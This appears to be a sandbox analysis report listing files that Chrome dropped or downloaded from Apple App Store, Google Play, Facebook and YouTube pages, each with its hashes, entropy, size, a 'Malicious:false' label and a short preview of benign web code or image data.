                                                                                                                                                                                                                                  SHA-512:9BFA2CF2EDA8AE9BF95EDB16CB8E076CC18693AC25727871B3ECF1C6B22268C6745BB49A49BA66236CB9224BF6CC3DABE38229A703602A3CA62DEFE1552737F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/web-experience-app-ef5f5b62ff48eb6b3d594ccbde0b4496.modern.js
                                                                                                                                                                                                                                  Preview:/*! See /acknowledgements.txt for open-source licenses */."use strict".define("web-experience-app/app",["exports","@ember/application","@ember/debug","@amp/web-apps-featurekit","web-experience-app/resolver","ember-load-initializers","web-experience-app/config/environment","web-experience-app/utils/config","web-experience-app/utils/consts"],(function(e,t,r,i,n,a,o,l,s){function p(e,t,r){var i.return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e.var r=e[Symbol.toPrimitive].if(void 0!==r){var i=r.call(e,t||"default").if("object"!=typeof i)return i.throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"))?i:String(i))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0,"undefined"==typeof global&&"undefined"!=typeof window&&(window.global=window).class c extends t.default{constructor(...e){super(...e)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):164
                                                                                                                                                                                                                                  Entropy (8bit):6.560027690474973
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:u1Zrql17vRGlYo0Dr9TpkNTF3N9aQgn+39IzWIkYutRCv3hCEKX/n:u1Z+l17vRGMhuRT9p3WzWeutkvRCEKvn
                                                                                                                                                                                                                                  MD5:C3D7960132B3DA262B721E88CFB2583F
                                                                                                                                                                                                                                  SHA1:1612089211858694E09F6F715F3A0B4145DBA674
                                                                                                                                                                                                                                  SHA-256:DE88165FA4D58B4AD531B6F8D8FACBC5DC00F73E96B617E503D36FEE29C53CEC
                                                                                                                                                                                                                                  SHA-512:F18E3F59F71CF7521938C90826FDC28BB7F3EF43749C4DBC48F46FD6FA1B293A58461B50E021B7569F4EDD55B5129C4755E61E3D4F1205B7535F5A572A6EBE45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../.......$)...M.=.X.~..Qm.J.....@.Z.......{...m.FiS...`..V..l&Z*. "...V..(..N......c..eLp..@..+..$..;.3......D.&a;|...H..R|;..3..#XD..UR..>V..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):14488
                                                                                                                                                                                                                                  Entropy (8bit):7.877375184944868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:i+nkZheKRIwrm/a48si3/C1UKkb/0XUTkxXqDB/8:i+nkZIK+wrm/mP0K0XWdN/8
                                                                                                                                                                                                                                  MD5:4544570A922C51E96CB2F1BB67A0608E
                                                                                                                                                                                                                                  SHA1:ED99AD69140AA35B702FFDC6E0AABB78F529E18D
                                                                                                                                                                                                                                  SHA-256:B1A9CA2D487FBA3195C3B53218A97328A31C10F45686550704957A8913BABB87
                                                                                                                                                                                                                                  SHA-512:A79079CF4B0E3FA0B91F61C0AF75DA7F0E947B09FB0CA9D7FC2ACDB5E2A98604B7AE78EBBAD6AF3DF95D8FA54EE970DA1D64770384A1A273311A81D7B5B13E20
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/3mkmZHd6xK8/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF..............................%%..""%%%%..'10-'--5=PB58K9--DaEKSV[\[2AemdXlPY[W......./..0W?57WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................C.......................!..1AQ..Raq...."2B...Sbr..#3...Cs..4....c................................(........................!1.AQ"2a.....q............?........................................................................................................................................................................%...=..5.. %...=...X"._@...>... %...=].CK.@Z..Od.......7.ib..],......~A....o.l..t...::|c....d...........'.<.r..D..#.._..)....`7...G^.....z..T...|2......./..:?...9}..u.....I.s.?gFu........_yC.O.G..1.yC.O.Nk....5......1.yC.O.C.........7.................."?.....?.5...M.q.s t..V+.G.O.F.......S....n?.G:......m.k.m..g..q.7.U.O.m.K......<...S.y.#[3.M..Q..E.y. .c......YH..hy..5e..g...U8...9>.,....<...S.9.!.?....^z*...~Bt]N1......e /-.S.y. .c....... ].c...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16042)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):182311
                                                                                                                                                                                                                                  Entropy (8bit):5.451905341264212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:nxgSNPtIa33ZDcnkoSyOjb4SVPkFKsoP90Cls+j5ppjKa:q0kRG
                                                                                                                                                                                                                                  MD5:84D2537133FE5ECA4A2637D15B9825DC
                                                                                                                                                                                                                                  SHA1:B5D7E28F8E7278EC8ED139B4BBACEB233268E7B3
                                                                                                                                                                                                                                  SHA-256:02B230AE382133BF1CC981246A730C3B33E81DFCD17E9A1AA4991939631981FD
                                                                                                                                                                                                                                  SHA-512:06E11485B2CE0C08FF1526B713997BE6BAA8763E0E169EB3B52CF6F782F96E92A9AD6E89908EDD1F099C40CDF2F5D720DAFDD31010E6BE7CD3A81F3E62289CA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("compareDOMOrder",[],(function(a,b,c,d,e,f){"use strict";function a(a,b){return a.compareDocumentPosition(b)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1}f["default"]=a}),66);.__d("createLayoutContext",["compareDOMOrder","emptyFunction","react","useRefEffect","useUnsafeRef_DEPRECATED"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useContext,l=b.useImperativeHandle,m=b.useMemo,n=b.useReducer;function a(a){var b={getLayout:function(){return a},dispatch:c("emptyFunction"),nodes:new Map(),values:[]},d=j.createContext(b);function e(a){var b=a.children,c=a.imperativeRef,e=a.value;a=q();var f=a[0],g=a[1],h=a[2];l(c,function(){return{forceUpdate:function(){return h()}}},[h]);a=m(function(){return{getLayout:e,dispatch:h,nodes:f,values:g}},[h,f,e,g]);return j.jsx(d.Provider,{value:a,children:b})}e.displayName=e.name+" [from "+f.id+"]";function g(a){return j.jsx(d.Provider,babelHelpers["extends"]({value:b},a))}g.displayName=g.name+" [from "+f.id+"]
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):60476
                                                                                                                                                                                                                                  Entropy (8bit):7.993110142611454
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:zS8qpTxxqzhkOlrZHy4MKEl4A4BwM/EzYSr/TaKzYp8gQoi058SHc0lT5fKTee8u:zS8qtqzHRlyAElUieE0SA8gqA8SHrQL7
                                                                                                                                                                                                                                  MD5:4BC38B50B6C612518D5F544E36B32024
                                                                                                                                                                                                                                  SHA1:DA8CA87C9238FDC8EB3316C65A8202467FAD4015
                                                                                                                                                                                                                                  SHA-256:C45F8416C8EF731EFEAC53F0582A8DEF797F9159E5277BFB311A729723722A76
                                                                                                                                                                                                                                  SHA-512:952033583F2E3F9BDBC1205309702AB03723F5EA22B32CB90BCA7E7D6303ED4975B4F93B5BB62DA2EC09E6B95081D090408EDD28D71CA45D3E1724827BD73A76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw
                                                                                                                                                                                                                                  Preview:RIFF4...WEBPVP8X..............VP8L..../..2.M.l.n.`-...u0...K..|G.....~....q...:..,...2...E.C..o...8.~.........../8..C....!.......C. .d..P.XK..0.....@.3A......@.)``.m..vT..(Pn..,.%..6.b..u...f.....7|.~SO.)....vS.z?..u/..3f...r.Z..-}=.2.w.^........R...f...R...~G....T.k..r....>.^.rJ..].....y.S.....lK.X.U..\=4..w+.Y.).._.;.......^*D.....9...ms[I.B..1..lLQ..=9..t5+.%...*.l.0.0B.BP.mm.<.$3......Y....d...N"...O..o.P......<..]....:!..4.B........*......>.L._..wUwUw......._...._6+..W.~..6.|.u.....gz.L....Wz.L.|...z.B.|.?.Z>.]U.KK...^$;.....P......^>..g*..3E.}..^..'....Z>...k.I.Y%%Y.,.,.....VV.@......*..=.....@f./.X..=....;....s......@.....<. ...@..L.....W`.r..q.q.8........d$.@AF62 ..@ #...^.2.Q....@<....p....8h..)...<..M....@.....#..2............OW&.3......T..*R.......w.f....P...P...".....Y.^4.1..O...z..@.#0..;6.......;<<..|.....q...\..[...*B.#..../.#...m}nT..g. .' ....rZ.i....U.gE.XzJ.[<.t5s..j....9.|..Sl...8.7.....}w..]v.........~..VM.%.a0..q..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (3256)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30189
                                                                                                                                                                                                                                  Entropy (8bit):5.396190125614001
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kAEuymY99x3Yx9YXMAuzwqxaf4XByCL0xkc:P3i37T7FQ0CL0xp
                                                                                                                                                                                                                                  MD5:56B7FCA02CFACE9E71C2AE38EB25AFE1
                                                                                                                                                                                                                                  SHA1:D7A4B3ADAE9B1619379EFE66711B2DAC7B3F8F45
                                                                                                                                                                                                                                  SHA-256:0D410C6C2E55A84B012837257DD6239044DB1621E0F6DE52EA4E332E898F8E34
                                                                                                                                                                                                                                  SHA-512:EE93C53CAA66B8176631F44507B5A7FE7130093CD4EBB6083CB8866703E39030CEE10C97EF9E993FBD589F77F3FAFF3405C738289D7BD67D44E5E17F2BFDD038
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("LynxGeneration",["LinkshimHandlerConfig","URI"],(function(a,b,c,d,e,f,g){var h,i=new(h||(h=c("URI")))(c("LinkshimHandlerConfig").linkshim_path).setDomain(c("LinkshimHandlerConfig").linkshim_host),j={getShimURI:function(){return new(h||(h=c("URI")))(i)},getLynxURIProtocol:function(a){return c("LinkshimHandlerConfig").always_use_https?"https":a.getProtocol()==="http"?"http":"https"},getShimmedHref:function(a,b,d){var e;a=new(h||(h=c("URI")))(a);var f=j.getLynxURIProtocol(a);a=j.getShimURI().setQueryData((e={},e[c("LinkshimHandlerConfig").linkshim_url_param]=a.toString(),e[c("LinkshimHandlerConfig").linkshim_enc_param]=b,e)).setProtocol(f);b=d==null?void 0:d.trackingNodes;e=d==null?void 0:d.callbacks;b&&b.length&&(a=a.addQueryData("__tn__",b.join("")));e&&e.length&&(a=a.addQueryData("c",e));return a}};a=j;g["default"]=a}),98);.__d("NonFBLinkReferrerProtector",["$","LinkshimHandlerConfig","Parent","URI","cr:5662","setTimeout"],(function(a,b,c,d,e,f){"use strict";var
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):531
                                                                                                                                                                                                                                  Entropy (8bit):5.403118001502353
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:kRZTFL1+qhzoLCWo8OiqX75EOI/AIjnIi2Pc8kbRN20:kzV1uLDvodw1nDOcprl
                                                                                                                                                                                                                                  MD5:F37A3219410177C02D0AB4C4F69683CB
                                                                                                                                                                                                                                  SHA1:1121F70255447F18C1D6E919EE93D8C7C8DCC9B4
                                                                                                                                                                                                                                  SHA-256:8AC6EC6AB22385057B257F75C990335D8EC2F944D6CB69AFF22A21EC2EB5B113
                                                                                                                                                                                                                                  SHA-512:BCF683F6D6518DD83B35FF6751601474DD31A9F20605C5C60F6DB1E35DEDC322096C64A19AE77A96FC146219ADB46EEB34C6622355742018AB4043B608F1D766
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=UINLVc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.aSc=function(a){var b=a.qa,c="";a=a.Ks.H();c+='<div class="'+_.T("HTh71e")+'"'+_.Vo(_.Uo(_.dp(a)))+">"+_.Q(a)+"</div>";c=""+_.N5((0,_.P)(c),"C3Eyue");b=""+_.$W({qa:b,body:(0,_.P)(c)});return(0,_.P)(b)};._.u("UINLVc");._.qr(_.CBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"UINLVc"}Xa(){return _.aSc}});_.$q.UINLVc=_.eRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2634)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9946
                                                                                                                                                                                                                                  Entropy (8bit):5.303383252274076
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NdbWsWxwiKpBpVyPPjg9bt9MVzclvs4oRL19n3kufDi/9secuFjel:LbWsWx3KDXR9THl1iL1l3kufG/9sebjS
                                                                                                                                                                                                                                  MD5:9BB28E4E947B15C91F9178EFF5B23264
                                                                                                                                                                                                                                  SHA1:87F5AC3AE29A7455DD00F79435B1D91F664F0395
                                                                                                                                                                                                                                  SHA-256:9FEC8921027F561C8BD0FDF17C244E35F26ABA8E336571597FCCCD9D42D7A0CA
                                                                                                                                                                                                                                  SHA-512:4566D611CDC37D0F4C34D36ABA45AF69036C4A9E155FAAEC80D70B20C24555A319C8227377D9AA7E7EF02077C2E83C050DB8BACCDBF48417D8772F64818AA7A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[722],{32722:function(e,t,i){var n=i(24178),r=i(76588),o=n.SC.attachDelegate,s={setDelegate:function(e){return o(this,e)},localStorageObject:n.tO.localStorageObject,sessionStorageObject:n.tO.sessionStorageObject},a=n.SC.attachDelegate,c={setDelegate:function(e){return a(this,e)},makeAjaxRequest:n.L5.makeAjaxRequest},l=n.SC.attachDelegate,u=n.SC.hasAnyKeys,p=n.SC.isArray,h=n.tO.saveObjectToStorage,d=n.tO.objectFromStorage,g=n.P0.exponentialBackoff,f=n.EE.valueForKeyPath,S="noTopicConfig",v={blacklistedFields:["capacitySystem","capacitySystemAvailable","capacityDisk","capacityData","capacityDataAvailable"],compoundSeparator:"_",configBaseUrl:"https://xp.apple.com/config/1/report",constraints:{profiles:{AMPWeb:{precedenceOrderedRules:[{filters:"any",fieldConstraints:{clientId:{generateValue:!0,namespace:"AMPWeb_isSignedOut",expirationPeriod:864e5}}},{filters:{valueMatches:{isSignedIn:[!0]}},
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (508)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1347
                                                                                                                                                                                                                                  Entropy (8bit):5.328908510659996
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kz8S0W2NFUse3RrIqWEGTZfYM4M5sNIvWFoEJOZXeZuorl:k8FvXEC1COsXNrl
                                                                                                                                                                                                                                  MD5:5FAE4038F5A018D6C4E8492373074696
                                                                                                                                                                                                                                  SHA1:B59FD1C317D61B59A49294033C21D067E3E97F71
                                                                                                                                                                                                                                  SHA-256:290BFD02F4B8BC366146BAC70C8C9FC6DEC13B4FEEEB188D8E268CEE3CA04541
                                                                                                                                                                                                                                  SHA-512:B7B8D130EFEA0BA01D6B24B997BE57AD892AD3B4BE3A12A9A845029504EF4D190C132D13121D3766CCAAAA6D894636AFB4799368CE30DDE10BC8C1D034ECF21A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.uAa=_.B("GG0PW",[_.vk,_.Dj]);._.u("GG0PW");.var s5=class extends _.ys{static Ia(){return{model:{component:_.nr},service:{window:_.tr}}}constructor(a){super(a.ta);const b=a.service.window.Bc();this.body=_.un(b.body);this.ka=b.documentElement.dir==="rtl";this.Ob=a.model.component;this.H=_.eh(this.Ob.getParams(_.r5),1);this.UG=0;_.Qk(this,_.lr(this.Ob).then(({Xr:c})=>{this.UG=c.oj().length-1}))}ua(){this.body.Cb("overflow","hidden");this.Qa("c4YZDc").focus()}na(a){a=a.event;if(a?.key===void 0)return!0;switch(a.key){case "ArrowLeft":this.ka?this.N():.this.V();break;case "ArrowRight":this.ka?this.V():this.N();break;case "Escape":this.close();break;default:return!0}return!1}V(){this.H<=0||(this.H--,_.mr(this.Ob,_.jDc(new _.r5,this.H)))}N(){this.H>=this.UG||(this.H++,_.mr(this.Ob,_.jDc(new _.r5,this.H)))}close(){this.ma().remove();this.body.Cb("overflow","")}};_.V(s5.prototype,"TvD9Pc",func
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (326)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7835
                                                                                                                                                                                                                                  Entropy (8bit):5.7037022399580755
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wfB/5+dzPThTETLTf6LIErhvEpLAQAtuUs59BbLnSXGAxF:wfN5QfdenfAMuH0XkF
                                                                                                                                                                                                                                  MD5:2929F5A19DF395677697F7E2390B7FB1
                                                                                                                                                                                                                                  SHA1:590DDA6F95DDE4F554323144FC0BB9DBF5AA26FA
                                                                                                                                                                                                                                  SHA-256:DBA7DBBDB20E1C8DC044C571D1F9327F2BE09C3B11650EB6F8D7BFD3A431E189
                                                                                                                                                                                                                                  SHA-512:A109107075813C58669C266F9EB601A5C39F497C5EBD46D776D812D56E7920EDFF1B03CCCFA3D6C36F3F9AE8A35CE4C6AA7100F843CE0F9B9EBE66D94185602A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/af/e7/92/afe79244-897a-982a-4b1a-72594198bffa/P875466468_default.m3u8
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:7.#EXT-X-INDEPENDENT-SEGMENTS..#-- en (3) --.#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-HE2-stereo-32",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6daa-09ae6735af46/P875466468_Anull_audio_en_gr32_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-64",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d933-df87a038d9f9/P875466468_Anull_audio_en_gr64_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-128",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8"..#EXT-X-I-FRAME-STREAM-INF:AVERAGE-BANDWIDTH=190609,_AVG-BANDWIDT
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2549
                                                                                                                                                                                                                                  Entropy (8bit):4.065824216102575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:t4tQ6dEHu+4CE/EiFyCmxOJLGe1sxmJLOTyX3WCQ9yCmxOJLA5J2z5D6M9JMPxg0:WiE/yCmr9hj9mP0kOpFnqo7gX
                                                                                                                                                                                                                                  MD5:ECD94021D2C853C3B8DEB8203BA17300
                                                                                                                                                                                                                                  SHA1:6F0E24BAF66AE386041E8FAF42363418A4C96144
                                                                                                                                                                                                                                  SHA-256:0D6F8D206A6BD8B60A2048A3DF206AC956A2F633786E4AF1C02057F81758AD7A
                                                                                                                                                                                                                                  SHA-512:1967613484EB4FB2A50628CCED684C3E1022D1DF51D5AA86ADE53828DBDF0A748A8E99669C08EC5A9AA4BA97DC74F709AD4798BF486C1BAEEC60D24B223E5D50
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360">. <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5264)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19109
                                                                                                                                                                                                                                  Entropy (8bit):5.306733844584032
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:mAjHWQIcLvvbeje34p4SFimdh/nWrQ8ekgtocqS04ZrahU6M/MhlxvXyYHYadMIE:Riiqi3QFiuPkg7qaZWhBMOlxvXVo
                                                                                                                                                                                                                                  MD5:89EB93272AB81EA04A7890E1F270EB00
                                                                                                                                                                                                                                  SHA1:42DBDAF298DE10D9B4304C2407EFA15B66BBE38C
                                                                                                                                                                                                                                  SHA-256:EB4942819765B3C2D89FDB417F002D6002D07677F33682D6AFA93C45D0C4A020
                                                                                                                                                                                                                                  SHA-512:05F688EDF1444E15ABFDD4469667BE4835D99A54D062B165AD5D94261E3ABD3EE4F59E7B0A53A0E341D2704D2F6675EEB10E42570E671871C72240B380E16D22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsALSurfaceMessagePlugin",["feature"],(function(a,b,c,d,e,f,g){"use strict";function a(){var b=babelHelpers.taggedTemplateLiteralLoose(["ABPInfra_DeliveryProducts_Guidance"]);a=function(){return b};return b}b={type:"alSurface",key:"msg",logKey:"msg",feature:d("feature").feature(a())};c=b;g["default"]=c}),98);.__d("AdsALMessageSurface.react",["AdsALSubsurface","AdsALSurfaceConditional","AdsALSurfaceMessagePlugin","react"],(function(a,b,c,d,e,f,g){"use strict";var h;h||d("react");a=function(a){var b=a.children,e=a.moduleId;a=babelHelpers.objectWithoutPropertiesLoose(a,["children","moduleId"]);return c("AdsALSurfaceConditional")(babelHelpers["extends"]({surface:c("AdsALSurfaceMessagePlugin"),subsurface:d("AdsALSubsurface").getDynamicSubsurface(e.replace(".react",""))},a,{capability:babelHelpers["extends"]({},a.capability,{trackVisibilityThreshold:.5})}))(b)};g.AdsALMessageSurface=a}),98);.__d("AdsInterfacesRouteBuilder",["ifRequired","performanceNow"],(function(a,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12786)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):70338
                                                                                                                                                                                                                                  Entropy (8bit):5.78742439640554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I8ZCnfiUZxilnEe6xw15ZKXlk4+1W7BH9zzOsB+ySF8A8ECnfd0ovY7ORxdC0TON:9ZTNwoZKX5oMH9bBTtjCviz7pE/Rxqh+
                                                                                                                                                                                                                                  MD5:ECF58AA5DE3AB7B77322D00E09F211E6
                                                                                                                                                                                                                                  SHA1:164D51A0CA69981195BCCF74510449CEA5A7CA09
                                                                                                                                                                                                                                  SHA-256:3B77180B30819B69D8927237E0B76841D2A441CF3603586108C27E59768288C5
